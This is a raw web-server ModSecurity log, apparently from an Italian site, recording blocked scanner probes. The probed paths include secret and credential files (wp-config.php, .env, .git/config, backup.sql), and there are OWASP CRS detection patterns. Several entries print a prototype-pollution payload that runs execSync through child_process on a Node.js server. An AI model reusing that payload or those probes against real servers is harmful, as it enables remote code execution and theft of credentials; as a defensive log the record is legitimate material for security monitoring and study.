[Wed Jan 14 05:24:26.396691 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aWcaevL7maAL7YwXfyRF1QAAAAY"]
[Wed Jan 14 05:24:26.396885 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aWcaevL7maAL7YwXfyRF1QAAAAY"]
[Wed Jan 14 05:24:26.397053 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aWcaevL7maAL7YwXfyRF1QAAAAY"]
[Wed Jan 14 05:24:26.418138 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWcaevL7maAL7YwXfyRF1gAAAAY"]
[Wed Jan 14 05:24:26.418259 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWcaevL7maAL7YwXfyRF1gAAAAY"]
[Wed Jan 14 05:24:26.418464 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWcaevL7maAL7YwXfyRF1gAAAAY"]
[Wed Jan 14 05:24:26.418611 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.old"] [unique_id "aWcaevL7maAL7YwXfyRF1gAAAAY"]
[Wed Jan 14 05:24:26.461838 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.php.bak"] [unique_id "aWcaevL7maAL7YwXfyRF2AAAAAY"]
[Wed Jan 14 05:24:26.462128 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.php.bak"] [unique_id "aWcaevL7maAL7YwXfyRF2AAAAAY"]
[Wed Jan 14 05:24:26.462281 2026] [:error] [pid 1401182] [client 195.178.110.132:65510] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.php.bak"] [unique_id "aWcaevL7maAL7YwXfyRF2AAAAAY"]
[Wed Jan 14 11:41:02.816105 2026] [:error] [pid 1401182] [client 85.11.167.4:52902] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768387262_7191',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvvL7maAL7YwXfyRF_gAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.816234 2026] [:error] [pid 1401182] [client 85.11.167.4:52902] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1768387262_7191',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvvL7maAL7YwXfyRF_gAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.816333 2026] [:error] [pid 1401182] [client 85.11.167.4:52902] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1768387262_7191 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvvL7maAL7YwXfyRF_gAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.817428 2026] [:error] [pid 1401182] [client 85.11.167.4:52902] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvvL7maAL7YwXfyRF_gAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.817574 2026] [:error] [pid 1401182] [client 85.11.167.4:52902] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvvL7maAL7YwXfyRF_gAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.932942 2026] [:error] [pid 1400439] [client 85.11.167.4:52910] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768387262',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvhZiJWN5ANZoWOd0zgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.933070 2026] [:error] [pid 1400439] [client 85.11.167.4:52910] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1768387262',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvhZiJWN5ANZoWOd0zgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.933142 2026] [:error] [pid 1400439] [client 85.11.167.4:52910] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1768387262 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvhZiJWN5ANZoWOd0zgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.934175 2026] [:error] [pid 1400439] [client 85.11.167.4:52910] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvhZiJWN5ANZoWOd0zgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 11:41:02.934313 2026] [:error] [pid 1400439] [client 85.11.167.4:52910] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aWdyvhZiJWN5ANZoWOd0zgAAAAE"], referer: https://economiasolidale.test.indacotrentino.com
[Wed Jan 14 12:05:10.491929 2026] [:error] [pid 1400442] [client 35.180.113.122:45380] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWd4ZndjbuaU9rmVGArPSAAAAAQ"]
[Wed Jan 14 12:05:10.492208 2026] [:error] [pid 1400442] [client 35.180.113.122:45380] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWd4ZndjbuaU9rmVGArPSAAAAAQ"]
[Wed Jan 14 12:05:10.492418 2026] [:error] [pid 1400442] [client 35.180.113.122:45380] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWd4ZndjbuaU9rmVGArPSAAAAAQ"]
[Wed Jan 14 12:05:10.575020 2026] [:error] [pid 1400441] [client 35.180.113.122:45408] [client 35.180.113.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWd4ZvDQTrRwdMNdhh-mvwAAAAM"]
[Wed Jan 14 12:05:10.575248 2026] [:error] [pid 1400441] [client 35.180.113.122:45408] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWd4ZvDQTrRwdMNdhh-mvwAAAAM"]
[Wed Jan 14 12:05:10.575408 2026] [:error] [pid 1400441] [client 35.180.113.122:45408] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWd4ZvDQTrRwdMNdhh-mvwAAAAM"]
[Wed Jan 14 12:05:10.746921 2026] [:error] [pid 1405561] [client 35.180.113.122:45498] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWd4ZjszkuqYgM6kDsoCoQAAAAc"]
[Wed Jan 14 12:05:10.747293 2026] [:error] [pid 1405561] [client 35.180.113.122:45498] [client 35.180.113.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWd4ZjszkuqYgM6kDsoCoQAAAAc"]
[Wed Jan 14 12:05:10.747455 2026] [:error] [pid 1405561] [client 35.180.113.122:45498] [client 35.180.113.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWd4ZjszkuqYgM6kDsoCoQAAAAc"]
[Wed Jan 14 12:05:10.831029 2026] [:error] [pid 1400438] [client 35.180.113.122:45544] [client 35.180.113.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] 